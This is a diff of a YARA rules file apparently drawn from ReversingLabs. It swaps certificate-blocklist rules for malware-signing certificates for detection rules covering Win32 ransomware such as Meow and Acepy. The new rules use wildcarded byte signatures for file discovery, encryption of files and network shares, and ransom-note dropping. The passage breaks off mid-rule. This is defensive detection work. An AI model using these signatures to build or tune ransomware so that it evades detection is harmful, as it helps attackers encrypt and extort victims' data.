+		$encrypt_network_shares_win32_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 8B
+            4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45
+            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F
+            85 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95
+            ?? ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 52
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$encrypt_network_shares_win32_p2 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ??
+            ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52
+            8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ??
+            83 C2 ?? 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 45 ?? 73 ?? 83 7D ?? ?? 76 ?? 8B 45
+        }
+		$encrypt_network_shares_win32_p3 = {
+            33 D2 B9 ?? ?? ?? ?? F7 F1 85 D2 75 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? EB ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 55 ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8B 4D ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8A 45 ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
+            C2
+        }
+		$find_files_win32_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? 03
+            D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? 59 EB
+            ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E 5F 5B 8B E5 5D
+            C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74
+            ?? 0F B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B
+        }
+		$find_files_win32_p2 = {
+            8D ?? ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ??
+            ?? ?? ?? 83 C4 ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA 42
+            F7 D8 68 ?? ?? ?? ?? 1B C0 33 FF 23 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B
+            85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74
+            ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B
+            48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
+            ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 50 FF B5 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ??
+            ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? ?? 59 75 ?? 8B 10 8B 40 ?? 8B
+            8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50
+            8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$encrypt_files_win32_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 83 7D ?? ?? 74 ?? 83 7D ?? ??
+            75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32
+            C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ??
+            51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 C0 66 0F 13 85 ??
+            ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D
+            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? ?? ?? ?? 7C ?? 8B
+            8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 55 ?? 52
+        }
+		$encrypt_files_win32_p2 = {
+            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
+            68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
+            ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 3B 4D ??
+            0F 83 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 D0
+            85 D2 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9
+            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D
+            ?? 8B 95 ?? ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85
+        }
+		$encrypt_files_win32_p3 = {
+            8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51
+            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
+            8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 39 45 ?? 75 ?? 0F 57
+            C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D
+            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Project NSRM Ltd" and ( pe.signatures [ i ] . serial == "00:83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" or pe.signatures [ i ] . serial == "83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" ) and 1549830060 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_win32_p* ) ) and ( all of ( $encrypt_files_win32_p* ) ) and ( all of ( $encrypt_network_shares_win32_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_09Aecea45Bfd40Ce7D62D7D711916D7D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Meow : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Meow ransomware."
 		author = "ReversingLabs"
-		id = "421425b1-13ad-5d80-b044-8bd43c60b3ff"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7cebb04d-1cda-5ad1-b412-8b38df7b2550"
+		date = "2022-10-24"
+		modified = "2022-10-24"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3008-L3024"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Meow.yara#L1-L84"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d1c6bfb10a244ba866c8aabdff6055388afa8096fd4bd77bb21f781794333e9b"
+		logic_hash = "b00753d2b150a815279297ddf40d70051d25de1c32bb90f5b706ea7fd36bb871"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Meow"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALINA LTD" and pe.signatures [ i ] . serial == "09:ae:ce:a4:5b:fd:40:ce:7d:62:d7:d7:11:91:6d:7d" and 1551052800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4Ff4Eda5Fa641E70162713426401F438 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "3e34aa1b-a4b1-593d-bd93-0f5913ab96b9"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3026-L3042"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "58f5e163d9807520497ba55e42c048020f6b7653ed71f3954e7ffb490f4de0e4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            72 ?? 8D 45 ?? BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 33 F6 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B4 B5 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C
+            ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 5F 5E 33 C0 5B 8B E5 5D C3 CC 55 8B EC 83 EC
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ??
+            75
+        }
+		$encrypt_files_p2 = {
+            8B 45 ?? 40 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 25 ?? ??
+            ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 74 ?? 8B 4D ?? 8D 46 ?? 03 CF 0F AF C8 89 4D ?? 8B
+            45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 75 ?? B9 ?? ?? ?? ?? 90 8B 45 ?? 99
+            F7 F9 8B 45 ?? 85 D2 74 ?? 48 EB ?? 40 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83
+            C8 ?? 83 C0 ?? 74 ?? EB ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 74 ?? 8B 45 ?? 8D
+            4E ?? 83 C0 ?? 99 F7 F9 B9 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 75 ?? 8B 45
+            ?? 99 F7 7D ?? 8B 45 ?? 85 D2 74 ?? 40 EB ?? 48 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74
+            ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 FF
+            D0 C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 45 ?? 99 F7 F9 8B 45 ?? 85 D2 74 ?? 83 C0
+            ?? 03 C3 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 0F 85
+        }
+		$drop_ransom_note = {
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            FF 74 ?? 8B CF E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 6A
+            ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D0 6A ??
+            68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 8B F0 BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF D0 B9 ?? ?? ?? ?? 8D BD ??
+            ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? 50 66 A5 A4 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD B8 ??
+            ?? ?? ?? 5F 5B 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files = {
+            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
+            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
+            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
+            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" and 1555349604 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_067Dffc5E3026Eb4C62971C98Ac8A900 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Acepy : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Acepy ransomware."
 		author = "ReversingLabs"
-		id = "9b9771bb-c2a4-5a6e-8fdb-b3e98f62f9b1"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "3ffb45b1-6bde-5bf8-957e-433b9488ba91"
+		date = "2022-08-04"
+		modified = "2022-08-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3044-L3060"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Acepy.yara#L1-L69"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b7c4cded14afd8ba3feabb6debaa1317917b811b44e22aa8a0b3ea00d689141"
+		logic_hash = "92c543a0b8c3c884f83647119d32c7b46f5fe839694bb8a8de0146c5c77bc587"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Acepy"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ??
+            83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ??
+            83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
+            8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files = {
